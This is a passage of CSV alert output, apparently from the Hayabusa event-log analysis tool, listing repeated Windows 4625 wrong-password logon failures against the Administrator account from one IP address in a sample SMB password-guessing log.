NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: 